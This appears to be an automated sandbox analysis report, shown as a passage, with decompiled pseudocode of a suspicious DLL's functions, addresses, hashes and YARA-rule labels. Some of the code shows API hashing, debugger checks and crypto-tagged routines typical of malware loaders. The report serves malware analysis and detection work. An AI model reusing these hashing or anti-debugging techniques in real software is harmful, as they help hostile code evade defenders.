				E00000201201640C908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t187 == _t237) goto 0x640c56ab;
				 *_t187();
				_t12 = _t249 + 0x30; // -126
				_t89 = E00000201201640C5BA4(_t12);
				_t13 = _t249 + 0x30; // -126
				r11d = _t89;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t18 = _t269 + 3; // 0x3
				E00000201201640C13EC(_t18, _t187, __rbx, _t13);
				 *((long long*)(_t249 + 0x40)) = _t187;
				if (_t187 == _t237) goto 0x640c59e0;
				r12d = 0xfb849f8f;
				E00000201201640C908C(r12d, _t187,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t187 == _t237) goto 0x640c5711;
				 *_t187();
				goto 0x640c5713;
				E00000201201640C908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
				if (_t187 == _t237) goto 0x640c572e;
				r13d =  *_t187();
				goto 0x640c5731;
				r13d = 0;
				_t23 = _t192 + 7; // 0x7
				r8d = _t273 + _t23;
				HeapAlloc(_t281, _t277, _t273);
				if (_t187 == _t237) goto 0x640c59d2;
				_t24 = _t192 + 1; // 0x1
				r8d = _t24;
				0x640c47b0();
				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x640c57a3;
				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0x640c57a3;
				_t188 =  *((intOrPtr*)(_t249 + 0x38));
				r8d = 6;
				0x640c47b0();
				_t32 = _t273 + 1; // 0x1
				r8d = _t32;
				0x640c47b0();
				_t234 = _t187;
				if (E00000201201640CA238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264) != 0) goto 0x640c59c4;
				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
				E00000201201640C908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
				if (_t188 == _t237) goto 0x640c57ea;
				 *_t188();
				goto 0x640c57ec;
				 *((intOrPtr*)(_t193 + 0x10)) = 0;
				_t41 = _t234 + 0x34; // 0x34
				r8d = _t41;
				 *((intOrPtr*)(_t193 + 0x14)) = 1;
				HeapAlloc(_t270, _t237, _t240);
				if (_t188 == _t237) goto 0x640c59b6;
				_t43 = _t249 + 0x30; // 0xfb849fcf
				_t109 = E00000201201640C5BA4(_t43);
				_t44 = _t249 + 0x30; // 0xfb849fcf
				r11d = _t109;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t49 = _t269 + 3; // 0x3
				E00000201201640C13EC(_t49, _t188, _t193, _t44);
				if (_t188 == _t237) goto 0x640c59a8;
				0x640cb158();
				HeapFree(_t243, ??);
				 *((long long*)(_t193 + 8)) = _t188;
				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x640c59fa;
				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
				if (_t141 == 0) goto 0x640c59fa;
				r8d = _t141;
				_t190 = _t193 + 0x28;
				 *((long long*)(_t249 + 0x20)) = _t190;
				if (E00000201201640C7CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0x640c59a8;
				r15d = 0x77;
				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
				HeapAlloc(??, ??, ??);
				if (_t190 == _t237) goto 0x640c59a3;
				_t62 = _t249 + 0x30; // 0xfb849fcf
				_t122 = E00000201201640C5BA4(_t62);
				_t63 = _t249 + 0x30; // 0xfb849fcf
				r11d = _t122;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t68 = _t269 + 3; // 0x3
				_t131 = E00000201201640C13EC(_t68, _t190, _t193, _t63);
				 *((long long*)(_t249 + 0x48)) = _t190;
				if (_t190 == _t237) goto 0x640c5995;
				0x640cb158();
				r11d = _t131;
				r15d = r15d - r11d;
				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x201640d129f;
				0x640cb158();
				 *((long long*)(_t193 + 0x20)) = _t190;
				goto 0x640c59b9;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return 2;
			}




























                                0x201640c5638
                                0x201640c5638
                                0x201640c5638
                                0x201640c563b
                                0x201640c563f
                                0x201640c5643
                                0x201640c5647
                                0x201640c5656
                                0x201640c565a
                                0x201640c5661
                                0x201640c5678
                                0x201640c567f
                                0x201640c5687
                                0x201640c568c
                                0x201640c568f
                                0x201640c569a
                                0x201640c56a2
                                0x201640c56a9
                                0x201640c56ab
                                0x201640c56b0
                                0x201640c56b5
                                0x201640c56ba
                                0x201640c56d4
                                0x201640c56d7
                                0x201640c56db
                                0x201640c56e3
                                0x201640c56eb
                                0x201640c56f5
                                0x201640c56fe
                                0x201640c5706
                                0x201640c570b
                                0x201640c570f
                                0x201640c571a
                                0x201640c5722
                                0x201640c5729
                                0x201640c572c
                                0x201640c572e
                                0x201640c5731
                                0x201640c5731
                                0x201640c573b
                                0x201640c5747
                                0x201640c574d
                                0x201640c574d
                                0x201640c5757
                                0x201640c576b
                                0x201640c5774
                                0x201640c5776
                                0x201640c577b
                                0x201640c578d
                                0x201640c5792
                                0x201640c5792
                                0x201640c579e
                                0x201640c57b0
                                0x201640c57ba
                                0x201640c57c0
                                0x201640c57d2
                                0x201640c57d9
                                0x201640c57e1
                                0x201640c57e6
                                0x201640c57e8
                                0x201640c57f1
                                0x201640c57f4
                                0x201640c57f4
                                0x201640c57f8
                                0x201640c57ff
                                0x201640c580b
                                0x201640c5811
                                0x201640c5816
                                0x201640c581b
                                0x201640c5820
                                0x201640c583a
                                0x201640c583d
                                0x201640c5841
                                0x201640c584c
                                0x201640c5871
                                0x201640c587e
                                0x201640c588c
                                0x201640c5893
                                0x201640c5899
                                0x201640c58a2
                                0x201640c58a8
                                0x201640c58b3
                                0x201640c58bb
                                0x201640c58c7
                                0x201640c58cd
                                0x201640c58db
                                0x201640c58e2
                                0x201640c58ee
                                0x201640c58f4
                                0x201640c58f9
                                0x201640c58fe
                                0x201640c5903
                                0x201640c591d
                                0x201640c5920
                                0x201640c5924
                                0x201640c5929
                                0x201640c5931
                                0x201640c5950
                                0x201640c595d
                                0x201640c5968
                                0x201640c5970
                                0x201640c5980
                                0x201640c598a
                                0x201640c5993
                                0x201640c599d
                                0x201640c59b0
                                0x201640c59be
                                0x201640c59cc
                                0x201640c59da
                                0x201640c59f9

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction ID: 1bf8675f40aa0dd3a67cf9906baaae44fcc608543a6bc08328c955ffded82184
                                • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction Fuzzy Hash: 44A1E129214BA0C7D710DB26E80A2DAA7A9F7C4BC4F544111BF4E47B5EDE3AC966C708
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EE374 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EE374(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t43;
				void* _t44;
				intOrPtr _t52;
				signed long long _t62;
				long long _t65;
				_Unknown_base(*)()* _t85;
				void* _t89;
				void* _t90;
				void* _t92;
				signed long long _t93;
				struct _EXCEPTION_POINTERS* _t99;

				_t45 = __ecx;
				 *((long long*)(_t92 + 0x10)) = __rbx;
				 *((long long*)(_t92 + 0x18)) = __rsi;
				_t3 = _t92 - 0x4f0; // -1288
				_t90 = _t3;
				_t93 = _t92 - 0x5f0;
				_t62 =  *0x13123760; // 0x8abfd9f97faf
				 *(_t90 + 0x4e0) = _t62 ^ _t93;
				_t52 = r8d;
				_t44 = __ecx;
				if (__ecx == 0xffffffff) goto 0x130ee3b3;
				E00007FFC7FFC130EBC04(_t36);
				_t5 = _t93 + 0x70; // 0x58
				r8d = 0x98;
				E00007FFC7FFC130EC440(__ecx, 0, _t52, __esp, _t5, __rdx, _t85, __r8);
				_t6 = _t90 + 0x10; // -1272
				r8d = 0x4d0;
				E00007FFC7FFC130EC440(_t45, 0, _t52, __esp, _t6, __rdx, _t85, __r8);
				_t7 = _t93 + 0x70; // 0x58
				 *((long long*)(_t93 + 0x48)) = _t7;
				_t10 = _t90 + 0x10; // -1272
				_t65 = _t10;
				 *((long long*)(_t93 + 0x50)) = _t65;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t65 == 0) goto 0x130ee446;
				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
				_t16 = _t93 + 0x60; // 0x48
				 *((long long*)(_t93 + 0x30)) = _t16;
				_t19 = _t93 + 0x58; // 0x40
				 *((long long*)(_t93 + 0x28)) = _t19;
				_t21 = _t90 + 0x10; // -1272
				 *((long long*)(_t93 + 0x20)) = _t21;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
				_t25 = _t90 + 0x508; // 0x0
				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
				 *((long long*)(_t90 + 0xa8)) = _t25 + 8;
				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t85, _t89);
				if (UnhandledExceptionFilter(_t99) != 0) goto 0x130ee4a8;
				if (_t40 != 0) goto 0x130ee4a8;
				if (_t44 == 0xffffffff) goto 0x130ee4a8;
				_t43 = E00007FFC7FFC130EBC04(_t42);
				E00007FFC7FFC130F6D80();
				return _t43;
			}

















                                0x7ffc130ee374
                                0x7ffc130ee374
                                0x7ffc130ee379
                                0x7ffc130ee382
                                0x7ffc130ee382
                                0x7ffc130ee38a
                                0x7ffc130ee391
                                0x7ffc130ee39b
                                0x7ffc130ee3a2
                                0x7ffc130ee3a7
                                0x7ffc130ee3ac
                                0x7ffc130ee3ae
                                0x7ffc130ee3b5
                                0x7ffc130ee3ba
                                0x7ffc130ee3c0
                                0x7ffc130ee3c7
                                0x7ffc130ee3cb
                                0x7ffc130ee3d1
                                0x7ffc130ee3d6
                                0x7ffc130ee3db
                                0x7ffc130ee3e4
                                0x7ffc130ee3e4
                                0x7ffc130ee3e8
                                0x7ffc130ee3ed
                                0x7ffc130ee402
                                0x7ffc130ee405
                                0x7ffc130ee40e
                                0x7ffc130ee410
                                0x7ffc130ee416
                                0x7ffc130ee423
                                0x7ffc130ee42b
                                0x7ffc130ee430
                                0x7ffc130ee435
                                0x7ffc130ee439
                                0x7ffc130ee440
                                0x7ffc130ee44d
                                0x7ffc130ee454
                                0x7ffc130ee45f
                                0x7ffc130ee463
                                0x7ffc130ee471
                                0x7ffc130ee475
                                0x7ffc130ee479
                                0x7ffc130ee483
                                0x7ffc130ee496
                                0x7ffc130ee49a
                                0x7ffc130ee49f
                                0x7ffc130ee4a3
                                0x7ffc130ee4b2
                                0x7ffc130ee4ce

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                • Opcode ID: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction ID: b8fa9b1c3342f5cd195a218d8db54b39ca3dff7b40b19d0f41d7a57df183d9ef
                                • Opcode Fuzzy Hash: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction Fuzzy Hash: EE316E36708F9586EB60CF25E8442AE73A4FB88768F500535EA9D53B98DF3CC565CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C7FD4 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 170memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E00000201201640C7FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
				void* __rdi;
				signed int _t34;
				void* _t66;
				char* _t104;
				void* _t131;
				char* _t134;
				long long _t140;
				void* _t141;
				void* _t143;
				void* _t144;
				signed long long _t156;
				void* _t158;

				_t106 = __rbx;
				_t104 = __rax;
				 *((long long*)(_t143 + 8)) = __rbx;
				 *((long long*)(_t143 + 0x18)) = _t140;
				 *((long long*)(_t143 + 0x20)) = __rsi;
				_t144 = _t143 - 0x40;
				r14d =  *0x640cd450;
				_t141 = __rcx;
				_t137 =  *((intOrPtr*)( *0x640cd458 + 8));
				r12d = 0;
				_t34 = r14d ^ __edx;
				if (_t34 == 0x139d2b8d) goto 0x640c80ef;
				if (_t34 == 0x15f5a8c2) goto 0x640c8115;
				if (_t34 == 0x2f77acf9) goto 0x640c80e9;
				if (_t34 == 0x48e12436) goto 0x640c81c8;
				if (_t34 == 0x4d382929) goto 0x640c8164;
				if (_t34 == 0xb016dc39) goto 0x640c80c9;
				if (_t34 == 0xb057dfc9) goto 0x640c805b;
				goto 0x640c821b;
				if (r9d == 0) goto 0x640c80bf;
				E00000201201640C85CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0x640cd458 + 8)), _t158);
				if (_t104 == 0) goto 0x640c80b5;
				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
				if (E00000201201640C14B8(_t104, _t106, _t141, 0x201640c34a4,  *((intOrPtr*)( *0x640cd458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0x640c80a2;
				goto 0x640c821b;
				HeapFree(_t131, ??);
				goto 0x640c821b;
				goto 0x640c821b;
				goto 0x640c821b;
				E00000201201640C908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0x640cd458 + 8)) + 0x18)));
				if (_t104 == 0) goto 0x640c80e2;
				 *_t104();
				goto 0x640c821b;
				r12d = 1;
				if ( *(_t141 + 0x50) == 0) goto 0x640c814a;
				E00000201201640C908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
				if (_t104 == 0) goto 0x640c8139;
				 *_t104();
				goto 0x640c813e;
				if (r9d == 0) goto 0x640c80bf;
				E00000201201640C85CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0x640cd458 + 8)), _t156);
				_t134 = _t104;
				if (_t104 == 0) goto 0x640c80b5;
				goto 0x640c807a;
				asm("sbb ebx, ebx");
				goto 0x640c814f;
				if (r12d == 0) goto 0x640c821b;
				if (0x426 != 0x426) goto 0x640c821b;
				if (_t134 == 0) goto 0x640c81be;
				if ( *_t134 == 0) goto 0x640c81be;
				E00000201201640C487A();
				if (E00000201201640C5448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0x640c81bc;
				if (E00000201201640C672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0x640c81be;
				asm("ror ax, 0x8");
				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
				r12d = 1;
				if (0 != 0) goto 0x640c821b;
				if ( *(_t141 + 0x50) == 0) goto 0x640c81fb;
				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
				E00000201201640C2874( *((intOrPtr*)( *0x640cd458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
				HeapFree(??, ??, ??);
				goto 0x640c8200;
				if (r12d == 0) goto 0x640c821b;
				_t27 = _t144 + 0x30; // 0x31
				_t66 = E00000201201640C9214( *((intOrPtr*)( *0x640cd458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0x640c8241;
				if (_t66 == 0x3e5) goto 0x640c8241;
				r8d = _t66;
				E00000201201640C6AC0( *0x640cd458,  *((intOrPtr*)( *0x640cd458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
				return _t66;
			}















                                0x201640c7fd4
                                0x201640c7fd4
                                0x201640c7fd4
                                0x201640c7fd9
                                0x201640c7fde
                                0x201640c7fe8
                                0x201640c7fec
                                0x201640c7ff3
                                0x201640c7ffd
                                0x201640c8004
                                0x201640c8007
                                0x201640c8011
                                0x201640c801c
                                0x201640c8027
                                0x201640c8032
                                0x201640c803d
                                0x201640c8048
                                0x201640c804f
                                0x201640c8056
                                0x201640c805e
                                0x201640c8066
                                0x201640c8071
                                0x201640c8082
                                0x201640c8096
                                0x201640c809d
                                0x201640c80aa
                                0x201640c80b0
                                0x201640c80ba
                                0x201640c80c4
                                0x201640c80d2
                                0x201640c80da
                                0x201640c80e0
                                0x201640c80e4
                                0x201640c80e9
                                0x201640c80f6
                                0x201640c8101
                                0x201640c8109
                                0x201640c8111
                                0x201640c8113
                                0x201640c8118
                                0x201640c8120
                                0x201640c8125
                                0x201640c812b
                                0x201640c8134
                                0x201640c8140
                                0x201640c8148
                                0x201640c8152
                                0x201640c815e
                                0x201640c816c
                                0x201640c8171
                                0x201640c8185
                                0x201640c8199
                                0x201640c81ac
                                0x201640c81b3
                                0x201640c81b7
                                0x201640c81be
                                0x201640c81c6
                                0x201640c81cf
                                0x201640c81d1
                                0x201640c81e4
                                0x201640c81f1
                                0x201640c81f9
                                0x201640c8203
                                0x201640c820d
                                0x201640c8219
                                0x201640c8224
                                0x201640c822c
                                0x201640c8236
                                0x201640c823c
                                0x201640c825b

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: ))8M$6$H$lJu
                                • API String ID: 3298025750-2816507560
                                • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction ID: b34e566be8ca3f24712103137b9d27dd174bde8de77dc942104fe3c13a6e76d8
                                • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction Fuzzy Hash: 2A61C822204B61C3FBA49B569C8E3EE52A9B784785F644021FF49477DFDE3AC865830C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF964 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E00007FFC7FFC130EF964(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t37;
				intOrPtr* _t66;
				signed long long _t68;
				long long _t70;
				long long _t72;
				long long _t78;
				void* _t83;
				void* _t90;
				long long _t104;
				long long _t108;
				void* _t110;
				intOrPtr* _t112;
				void* _t114;
				void* _t117;
				intOrPtr _t129;
				void* _t131;
				void* _t132;
				signed long long _t133;
				signed long long _t134;
				signed long long _t137;
				intOrPtr* _t138;

				_t66 = __rax;
				_a8 = __rbx;
				_a16 = __rdx;
				if (__rdx != 0) goto 0x130ef9a0;
				_t33 = E00007FFC7FFC130EE6A0(__rax);
				_t3 = _t108 + 0x16; // 0x16
				 *__rax = _t3;
				E00007FFC7FFC130EE580(_t33);
				goto 0x130efb40;
				asm("xorps xmm0, xmm0");
				 *((long long*)(__rdx)) = _t108;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = _t108;
				if ( *__rcx == _t108) goto 0x130efa0b;
				_a24 = 0x3f2a;
				_a26 = dil;
				E00007FFC7FFC130F3218( *__rcx,  &_a24);
				if (_t66 != 0) goto 0x130ef9e2;
				r8d = 0;
				_t37 = E00007FFC7FFC130EFB70(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
				goto 0x130ef9ee;
				0x130efc80();
				r14d = _t37;
				if (_t37 != 0) goto 0x130ef9fe;
				goto 0x130ef9b2;
				goto 0x130efb04;
				_t112 = _v88;
				_t129 = _v80;
				_a24 = _t108;
				_t68 = _t129 - _t112;
				_t137 = (_t68 >> 3) + 1;
				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
				_t134 = _t133 | 0xffffffff;
				if (_t90 == 0) goto 0x130efa6d;
				_t70 = _t134 + 1;
				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x130efa4e;
				if (_t108 + 1 != _t90) goto 0x130efa48;
				_a24 = _t108 + 1 + _t70;
				r8d = 1;
				E00007FFC7FFC130ED6D0(_t137, _t108 + 1 + _t70, _t108 + 1);
				_t78 = _t70;
				if (_t70 == 0) goto 0x130efafd;
				_t104 = _t70 + _t137 * 8;
				_t138 = _t112;
				_v96 = _t104;
				_a32 = _t104;
				if (_t112 == _t129) goto 0x130efaf3;
				_v104 = _t78 - _t112;
				_t131 = _t134 + 1;
				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x130efaad;
				_t132 = _t131 + 1;
				if (E00007FFC7FFC130F3144(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x130efb58;
				_t72 = _a32;
				 *((long long*)(_v104 + _t138)) = _t72;
				_a32 = _t72 + _t132;
				if (_t138 + 8 != _t129) goto 0x130efaa7;
				r14d = 0;
				 *_a16 = _t78;
				E00007FFC7FFC130EE114(_a16, _v104);
				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
				if (_t83 == 0) goto 0x130efb35;
				E00007FFC7FFC130EE114(_a16,  *_t112);
				if (_t108 + 1 != _t83) goto 0x130efb21;
				E00007FFC7FFC130EE114(_a16, _t112);
				return r14d;
			}

































                                0x7ffc130ef964
                                0x7ffc130ef964
                                0x7ffc130ef969
                                0x7ffc130ef988
                                0x7ffc130ef98a
                                0x7ffc130ef98f
                                0x7ffc130ef992
                                0x7ffc130ef994
                                0x7ffc130ef99b
                                0x7ffc130ef9a0
                                0x7ffc130ef9a3
                                0x7ffc130ef9a9
                                0x7ffc130ef9ae
                                0x7ffc130ef9b2
                                0x7ffc130ef9bb
                                0x7ffc130ef9c1
                                0x7ffc130ef9c5
                                0x7ffc130ef9d0
                                0x7ffc130ef9d6
                                0x7ffc130ef9db
                                0x7ffc130ef9e0
                                0x7ffc130ef9e9
                                0x7ffc130ef9ee
                                0x7ffc130ef9f3
                                0x7ffc130ef9fc
                                0x7ffc130efa06
                                0x7ffc130efa0b
                                0x7ffc130efa12
                                0x7ffc130efa1c
                                0x7ffc130efa20
                                0x7ffc130efa2d
                                0x7ffc130efa3b
                                0x7ffc130efa3f
                                0x7ffc130efa46
                                0x7ffc130efa4e
                                0x7ffc130efa55
                                0x7ffc130efa67
                                0x7ffc130efa69
                                0x7ffc130efa6d
                                0x7ffc130efa79
                                0x7ffc130efa7e
                                0x7ffc130efa84
                                0x7ffc130efa86
                                0x7ffc130efa8a
                                0x7ffc130efa8d
                                0x7ffc130efa94
                                0x7ffc130efa9b
                                0x7ffc130efaa3
                                0x7ffc130efaad
                                0x7ffc130efab4
                                0x7ffc130efab9
                                0x7ffc130efacd
                                0x7ffc130efad3
                                0x7ffc130efadf
                                0x7ffc130efaea
                                0x7ffc130efaf1
                                0x7ffc130efaf7
                                0x7ffc130efafa
                                0x7ffc130efaff
                                0x7ffc130efb18
                                0x7ffc130efb1f
                                0x7ffc130efb24
                                0x7ffc130efb33
                                0x7ffc130efb38
                                0x7ffc130efb57

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFC130EF994
                                  • Part of subcall function 00007FFC130EE5A0: IsProcessorFeaturePresent.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5A9
                                  • Part of subcall function 00007FFC130EE5A0: GetCurrentProcess.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                • String ID: *?$.
                                • API String ID: 4036615347-3972193922
                                • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction ID: f95dd1a1179fcd6098ac39930be04504ea9cde9839ea17868ce99e4dd37e3983
                                • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction Fuzzy Hash: 30510162B15FA981EB10DFA298000B963E4FB44BECB454536DE1D27BC9EE3CD466C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C31C0 Relevance: 3.9, APIs: 3, Instructions: 195memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 24%
                                			E00000201201640C31C0(long long __rbx, intOrPtr* __rcx, long long* __rdx, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t110;
				long long* _t130;
				long long* _t131;
				long long* _t132;
				long long* _t133;
				long long* _t134;
				void* _t163;
				void* _t164;
				intOrPtr* _t165;
				void* _t167;
				void* _t170;
				long long* _t172;
				void* _t174;
				void* _t175;
				void* _t177;
				long _t188;
				void* _t191;
				void* _t194;
				void* _t197;

				_t134 = __rbx;
				 *((long long*)(_t174 + 0x10)) = __rbx;
				 *((intOrPtr*)(_t174 + 0x20)) = r9d;
				 *((intOrPtr*)(_t174 + 0x18)) = r8d;
				_t175 = _t174 - 0x50;
				_t168 =  *__rcx;
				_t130 = __rdx;
				_t165 = __rcx;
				E00000201201640C6C34(__rbx, __rdx, __rcx,  *__rcx, _t170, _t177, _t197, _t194);
				if (_t130 == _t134) goto 0x640c3469;
				_t110 =  *((char*)(_t165 + 0x75)) - 6;
				_t6 = _t134 + 4; // 0x4
				r12d = _t6;
				if (_t110 > 0) goto 0x640c322c;
				if (_t110 != 0) goto 0x640c3223;
				if ( *((char*)(_t165 + 0x74)) - 2 > 0) goto 0x640c322c;
				 *((intOrPtr*)(_t175 + 0x90)) = 0;
				goto 0x640c3234;
				 *((intOrPtr*)(_t175 + 0x90)) = r12d;
				E00000201201640C908C(0x3fe3c8ba, _t130,  *((intOrPtr*)(_t168 + 0x48)));
				if (_t130 == _t134) goto 0x640c325f;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t175 + 0x20)) = 0;
				 *_t130();
				goto 0x640c3262;
				_t131 = _t134;
				 *((long long*)(_t165 + 0x28)) = _t131;
				HeapFree(_t191, _t188, _t164);
				if ( *((intOrPtr*)(_t165 + 0x28)) == _t134) goto 0x640c3469;
				if ( *((intOrPtr*)(_t175 + 0xa0)) == 0) goto 0x640c32be;
				E00000201201640C908C(0xe7f09937, _t131,  *((intOrPtr*)(_t168 + 0x48)));
